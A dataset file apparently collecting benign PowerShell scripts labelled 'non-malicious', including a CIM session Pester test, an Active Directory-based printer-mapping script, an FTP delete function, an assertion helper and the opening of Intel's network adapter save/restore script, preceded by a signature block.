A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEILz68MxFHsijqyhdgkQShjuu # Pebt9FgNRMk8f1bqy2WuMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEArJc2QRtVMZg0Xwj9ny2cTET+1ItMnWKju8F2Muf+MO06l1QHX6ElEfD2 # ZHu6WzM/8dbG04tSIPjyf9t+CjZOXhXDcKjcHxw+9AbZ7Vpy+gfejU2nLRExqanJ # Gd/s+h6vS01cTj7uQ/5zjQP6SQAumqP7II02VHl/gux2pOTglOllAm3e4GH7/6+M # o9YAwGquWSwrxM1zSDrtvoNl15t/QmEIoHdU7uGilK2QqVlXpoDGKBD6tx1TRdsN # 9l9dB2AeHmUkXtr7/3t3mOPIo8Jw42lQ9JDALzAwhJvCrHQ4C69zjcweRUWCBFLS # JmEKOydOmaLavIFfo/jB1soKEkvFwaGCF5QwgheQBgorBgEEAYI3AwMBMYIXgDCC # F3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDpsueeEbDYwTyJLpYOni8uopWNHIVBEokYZL/YeLerjgIGZxpym1wP # GBMyMDI0MTAyODExNDA0Mi41OTJaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHqMIIHIDCCBQigAwIBAgITMwAAAezgK6SC0JFSgAABAAAB7DANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # MzhaFw0yNTAzMDUxODQ1MzhaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCwR/RuCTbgxUWVm/Vdul22uwdEZm0IoAFs6oIr39VK # /ItP80cn+8TmtP67iabB4DmAKJ9GH6dJGhEPJpY4vTKRSOwrRNxVIKoPPeUF3f4V # yHEco/u1QUadlwD132NuZCxbnh6Mi2lLG7pDvszZqMG7S3MCi2bk2nvtGKdeAIL+ # H77gL4r01TSWb7rsE2Jb1P/N6Y/W1CqDi1/Ib3/zRqWXt4zxvdIGcPjS4ZKyQEF3 # SEZAq4XIjiyowPHaqNbZxdf2kWO/ajdfTU85t934CXAinb0o+uQ9KtaKNLVVcNf5 # QpS4f6/MsXOvIFuCYMRdKDjpmvowAeL+1j27bCxCBpDQHrWkfPzZp/X+bt9C7E5h # PP6HVRoqBYR7u1gUf5GEq+5r1HA0jajn0Q6OvfYckE0HdOv6KWa+sAmJG7PDvTZa # e77homzx6IPqggVpNZuCk79SfVmnKu9F58UAnU58TqDHEzGsQnMUQKstS3zjn6SU # 0NLEFNCetluaKkqWDRVLEWbu329IEh3tqXPXfy6Rh/wCbwe9SCJIoqtBexBrPyQY # A2Xaz1fK9ysTsx0kA9V1JwVV44Ia9c+MwtAR6sqKdAgRo/bs/Xu8gua8LDe6KWyu # 974e9mGW7ZO8narDFrAT1EXGHDueygSKvv2K7wB8lAgMGJj73CQvr+jqoWwx6Xdy # eQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPRa0Edk/iv1whYQsV8UgEf4TIWGMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCSvMSkMSrvjlDPag8ARb0OFrAQtSLMDpN0 # UY3FjvPhwGKDrrixmnuMfjrmVjRq1u8IhkDvGF/bffbFTr+IAnDSeg8TB9zfG/4y # bknuopklbeGjbt7MLxpfholCERyEc20PMZKJz9SvzfuO1n5xrrLOL8m0nmv5kBcv # +y1AXJ5QcLicmhe2Ip3/D67Ed6oPqQI03mDjYaS1NQhBNtu57wPKXZ1EoNToBk8b # A6839w119b+a9WToqIskdRGoP5xjDIv+mc0vBHhZGkJVvfIhm4Ap8zptC7xVAly0 # jeOv5dUGMCYgZjvoTmgd45bqAwundmPlGur7eleWYedLQf7s3L5+qfaY/xEh/9uo # 17SnM/gHVSGAzvnreGhOrB2LtdKoVSe5LbYpihXctDe76iYtL+mhxXPEpzda3bJl # hPTOQ3KOEZApVERBo5yltWjPCWlXxyCpl5jj9nY0nfd071bemnou8A3rUZrdgKIa # utsH7SHOiOebZGqNu+622vJta3eAYsCAaxAcB9BiJPla7Xad9qrTYdT45VlCYTtB # SY4oVRsedSADv99jv/iYIAGy1bCytua0o/Qqv9erKmzQCTVMXaDc25DTLcMGJrRu # a3K0xivdtnoBexzVJr6yXqM+Ba2whIVRvGcriBkKX0FJFeW7r29XX+k0e4DnG6iB # HKQjec6VNzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNN # MIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkE0MDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCO # HPtgVdz9EW0iPNL/BXqJoqVMf6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smOGTAiGA8yMDI0MTAyODA0MTQx # N1oYDzIwMjQxMDI5MDQxNDE3WjB0MDoGCisGAQQBhFkKBAExLDAqMAoCBQDqyY4Z # AgEAMAcCAQACAhoOMAcCAQACAhQzMAoCBQDqyt+ZAgEAMDYGCisGAQQBhFkKBAIx # KDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZI # hvcNAQELBQADggEBAILIYM82Dr6OQATDiRWNUyg2wRlmEUSqsB1JFEW74Yh1oAnU # ZKTsyjkj69LBZadyOOGYRONFXVrLg2UzYpOybudC6apWF7OLJj+IzfERluG9wFcn # KZ9nQJX9wRpYQTjI+HOGDzbNDtv/AZsljeI3E8vdDX2JA5g0hP9oaR70WD/wOq0P # R+x3mN5f1zd+9DKLNdoZln/PAUaAifsQHFa1V2SlrA1vNThkBK0cQg8uhyBgCm7A # sGaKUPGTfqjRwamualhSXVVcTqzB0lgWaEJSYXahgaHSlmMTGuAFMVHbFFtVtBr3 # X8aXaLyVh40TpbLQLBYIg/b1tbXcNuF8uOw+/uIxggQNMIIECQIBATCBkzB8MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNy # b3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAezgK6SC0JFSgAABAAAB7DAN # BglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8G # CSqGSIb3DQEJBDEiBCDZbGC1q166c4AiUTgQFWUXu37JMc63h5Riqa2y1BkU+TCB # +gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICcJ5vVqfTfIhx21QBBbKyo/xciQ # IXaoMWULejAE1QqDMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw # MTACEzMAAAHs4CukgtCRUoAAAQAAAewwIgQgsLR3G5TmSmMHedwiqAcbeNSpfnby # e1U8J5bYVqFB6MwwDQYJKoZIhvcNAQELBQAEggIATuThsm1Bqv7+rPoekoujar0S # UcKNkkQiywyHKcACDSbBIwXS909N4bSsOAUfisIH+q/maK0H0n+Q1JfVo7U0x4bD # /OUEAjLYahh0JZucIcOmNaiqMAH/BdFPZVFfETfU+E8GJ+89INyUm8sA6mUAjtj+ # iBTaebfrMTv6NQ5crG+udgY91qLZ12lshMNYfjexZSF1Qome0T5OHY2SyWy3r6f0 # 5NoroikKv/2bZpO3t2ARlcNTbbwSbWNQ6QNMhMpYVh1LHTqtUTovKOOqyMlTWs8l # 4niWJnl0P880nymi9hpkuLq9Gd4la8+fHlNMi/66Ul56kuXa4RGbeF/UGv3K8xXW # qAjdp+uyRNgMiOIravOegW+dcwJssX+mpQmOcrKiD43M6c7+QUd4ajtNTQwQL6Sn # IcjginHrMSyNorxBH48rsxb+3PJeLp+/6c1A1tSEzdMJLh2Ov7AML10/AkZpkmlZ # lP/OHiZtnK+It11efbS+C8cLi1YUYibKWXlZl8tDcYgORJ/LTZNFMufcARKClkbI # AcmqJwtFRiyLRrSa2it8Ba8l6H1nLkYnw7lg62HRE0XifTZ7c/qiM1ZD43KsMbVw # 7pP2utvd8kMVDUPKSFPLiNhJncE3CyqTLVOAoGXbB1ovt7Hdfis48ANguoZ/4VnA # joKwuJjmYr1nI50MuyY= # SIG # End signature block
combined_dataset/train/non-malicious/1990.ps1
1990.ps1
Describe "New-CimSession" -Tag @("CI","RequireAdminOnWindows") { BeforeAll { $sessions = @() } AfterEach { $sessions | Remove-CimSession -ErrorAction SilentlyContinue $sessions = @() } It "A cim session can be created" -Pending:(-not $IsWindows) { $sessionName = [guid]::NewGuid().Guid $session = New-CimSession -ComputerName . -Name $sessionName $sessions += $session $session.Name | Should -BeExactly $sessionName $session.InstanceId | Should -BeOfType "System.Guid" } It "A Cim session can be retrieved" -Pending:(-not $IsWindows) { $sessionName = [guid]::NewGuid().Guid $session = New-CimSession -ComputerName . -Name $sessionName $sessions += $session (Get-CimSession -Name $sessionName).InstanceId | Should -Be $session.InstanceId (Get-CimSession -Id $session.Id).InstanceId | Should -Be $session.InstanceId (Get-CimSession -InstanceId $session.InstanceId).InstanceId | Should -Be $session.InstanceId } It "A cim session can be removed" -Pending:(-not $IsWindows) { $sessionName = [guid]::NewGuid().Guid $session = New-CimSession -ComputerName . -Name $sessionName $sessions += $session $session.Name | Should -BeExactly $sessionName $session | Remove-CimSession Get-CimSession $session.Id -ErrorAction SilentlyContinue | Should -BeNullOrEmpty } }
combined_dataset/train/non-malicious/Add-NetworkPrinter.ps1
Add-NetworkPrinter.ps1
###########################################################################" # # NAME: Add-NetworkPrinter.ps1 # # AUTHOR: Jan Egil Ring # EMAIL: jan.egil.ring@powershell.no # # COMMENT: Windows PowerShell script to map a network printer based on Active Directory group membership. # The get-GroupMembership function are created by Andy Grogan, see his blogpost for more information on this function: # http://www.telnetport25.com/component/content/article/15-powershell/127-quick-tip-determining-group-ad-membership-using-powershell.html # Also see this blogpost for more information: # http://blog.powershell.no/2009/11/28/mapping-printers-based-on-active-directory-group-membership-using-windows-powershell # Tested with Windows PowerShell v 1.0/2.0 and Windows XP/Vista/7. # # You have a royalty-free right to use, modify, reproduce, and # distribute this script file in any way you find useful, provided that # you agree that the creator, owner above has no warranty, obligations, # or liability for such use. # # VERSION HISTORY: # 1.0 28.11.2009 - Initial release # ###########################################################################" $strName = $env:username function get-GroupMembership($DNName,$cGroup){ $strFilter = "(&(objectCategory=User)(samAccountName=$strName))" $objSearcher = New-Object System.DirectoryServices.DirectorySearcher $objSearcher.Filter = $strFilter $objPath = $objSearcher.FindOne() $objUser = $objPath.GetDirectoryEntry() $DN = $objUser.distinguishedName $strGrpFilter = "(&(objectCategory=group)(name=$cGroup))" $objGrpSearcher = New-Object System.DirectoryServices.DirectorySearcher $objGrpSearcher.Filter = $strGrpFilter $objGrpPath = $objGrpSearcher.FindOne() If (!($objGrpPath -eq $Null)){ $objGrp = $objGrpPath.GetDirectoryEntry() $grpDN = $objGrp.distinguishedName $ADVal = [ADSI]"LDAP://$DN" if ($ADVal.memberOf.Value -eq $grpDN){ $returnVal = 1 return $returnVal = 1 }else{ $returnVal = 0 return $returnVal = 0 } }else{ $returnVal = 0 return $returnVal = 0 } } $result = get-groupMembership $strName "Printer_group_01" if ($result -eq '1') { Invoke-Expression 'rundll32 printui.dll,PrintUIEntry /in /q /n"\\\\print-server\\printer-share"' }
combined_dataset/train/non-malicious/Remove-FTPFile_1.ps1
Remove-FTPFile_1.ps1
function Remove-FTPFile ($Source,$UserName,$Password) { #Create FTP Web Request Object to handle connnection to the FTP Server $ftprequest = [System.Net.FtpWebRequest]::Create($Source) # set the request's network credentials for an authenticated connection $ftprequest.Credentials = New-Object System.Net.NetworkCredential($username,$password) $ftprequest.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile # send the ftp request to the server $ftpresponse = $ftprequest.GetResponse() $ftpresponse }
combined_dataset/train/non-malicious/1501.ps1
1501.ps1
function Assert-FileDoesNotExist { [CmdletBinding()] param( [Parameter(Position=0)] [string] $Path, [Parameter(Position=1)] [string] $Message ) Set-StrictMode -Version 'Latest' if( Test-Path -Path $Path -PathType Leaf ) { Fail "File $Path exists: $Message" } }
combined_dataset/train/non-malicious/sample_36_39.ps1
sample_36_39.ps1
<# /// <copyright> /// INTEL CONFIDENTIAL /// /// Copyright 2014 Intel Corporation /// /// This software and the related documents are Intel copyrighted materials, and your use of /// them is governed by the express license under which they were provided to you ("License"). /// Unless the License provides otherwise, you may not use, modify, copy, publish, distribute, /// disclose or transmit this software or the related documents without Intel's prior written /// permission. /// /// This software and the related documents are provided as is, with no express or implied /// warranties, other than those that are expressly stated in the License. /// /// </copyright> #> #User input arguments param ( [Parameter(Mandatory=$true)] [string]$Action, [string]$ConfigPath, [switch]$BDF ) #Global file variables $Script:context $Script:service $Script:lockobj $script:options $Script:Adapters = $null $Script:bSave = $false $Script:bRestore = $false $Script:bRemove = $false $Script:bUpSave = $false $Script:bUpRestore = $false $Script:bANSInstalled = $true $Script:colImportAdapters = $null $Script:EnabledSystemAdapters = $null #Save off input parameters to be used in functions $Script:Action = $Action $Script:BDF = $BDF $Script:ConfigPath = $ConfigPath $Script:ScriptPath = $null #------------------------ Messages ------------------------ $Script:Messages = @{ Usage = @" Intel(R) SaveRestore.ps1 Copyright 2014 Intel Corporation. All rights reserved. Usage: SaveRestore.ps1 -Action -ConfigPath -BDF Example: SaveRestore.ps1 –Action save –ConfigPath C:\*File Path*\config.txt -Action is required. Valid values are 'save' and 'restore.' -ConfigPath is optional. It specifies the path and file name of the main configuration save file. If not specified, it is the script path and default file name (Saved_Config.txt). NOTE: The Saved_StaticIP.txt file name does not change and is always saved and restored from the script path. -BDF is optional. If specified during a restore, it will restore settings to adapters using their bus/device/function. The default configuration file names are Saved_Config.txt and Saved_StaticIP.txt. "@; # Performing a save/restore of configuration file at $Script:ConfigPath RunningSaveRestore = "Performing a save/restore of configuration file at"; SettingOEMValue = "Setting OEM custom value."; # Restoring primary and secondary adapters on $Team.TeamName RestoringTeamAdapters = "Restoring primary and secondary adapters on"; # Restoring $Team.TeamName / $Vlan.VlanName Restoring = "Restoring" RestoringAdapterIP = "Restoring adapter IP settings." RestoringTeamIP = "Restoring team IP settings." RestoringVLANIP = "Restoring VLAN IP settings." RestoringAdapterSettings = "Restoring adapter settings." RestoringTeamSettings = "Restoring team settings." RestoringVLANSettings = "Restoring VLAN settings." RestoringAdapterPartition = "Restoring adapter partition settings." NICPartitioningDetected = "Detected a device configured for NIC partitioning. We recommend you use the -BDF option when restoring." PerformingSave = "Saving the configuration." PerformingUpgradeSave = "Upgrading and saving the configuration." PerformingRestore = "Restoring the configuration." PerformingUpgradeRestore = "Upgrading and restoring the configuration." PerformingRemove = "Removing the team and VLAN device configuration." # $Script:ConfigPath file already exists. Do you want to overwrite it (y/n)? FileExistsPrompt = "file already exists. Do you want to overwrite it (y/n)?" #------------------------ Errors ------------------------ # No objects found for $class NoObjectsFound = "No objects found for" AdminRequired = "The save/restore script requires administrative rights. Please log in as an Administrator and try again." PROSetRequired = "The save/restore script requires Intel® PROSet to be installed. Please install Intel PROSet and try again." # Could not find the restore configuration file at $Script:ConfigPath. Please provide a path to the configuration file. ConfigNotFoundPart1 = "Could not find the restore configuration file at" ConfigNotFoundPart2 = "Please provide a valid path to the configuration file." # Configuration path $FilePath does not exist. Please provide a valid path. ConfigPathDoesntExist1 = "A directory in" ConfigPathDoesntExist2 = "does not exist. Please provide a valid path." ConfigFileNotSpecified = "No configuration file name specified. Please provide a valid file name." # Unable to set ... on ... UnableToSetPart1 = "Unable to set" UnableToSetPart2 = "on" #----------------------- Warnings ----------------------- UnableToFindDevice = "Unable to find Device. Please verify configuration file matches your system configuration." UnableToFindANS = "Intel(R) ANS is not present on the system. Any Team and VLAN information contained in the configuration file will not be restored." } #-----------------------------------------------------[Functions]------------------------------------------------------ # Set WMI lock Function BeginApply { # retrieve instance $Script:service = Get-WMiobject -class IAnet_netservice -namespace root\intelncs2 # create [in] parameters $inparams = $Script:service.GetMethodParameters("BeginApply") # spawn management object $Script:options = new-object System.Management.InvokeMethodOptions # add context for this script $Script:options.Context.Add('SaveRestoreApply', $true) $Script:options.Context.Add('GET_EXTENSIONS', $true) $Script:options.Context.Add('GET_EXT_KEYS_ONLY', $false) $Script:options.Context.Add('IANet_PartialData', 512) # obtain lock $Script:lockobj = $Script:service.InvokeMethod("BeginApply", $inparams, $Script:options) # this is necessary to set the lock into a new object $Script:context = new-object System.Management.ManagementNamedValueCollection # adding a new single named value to the collection with the value of the lock objects client handle 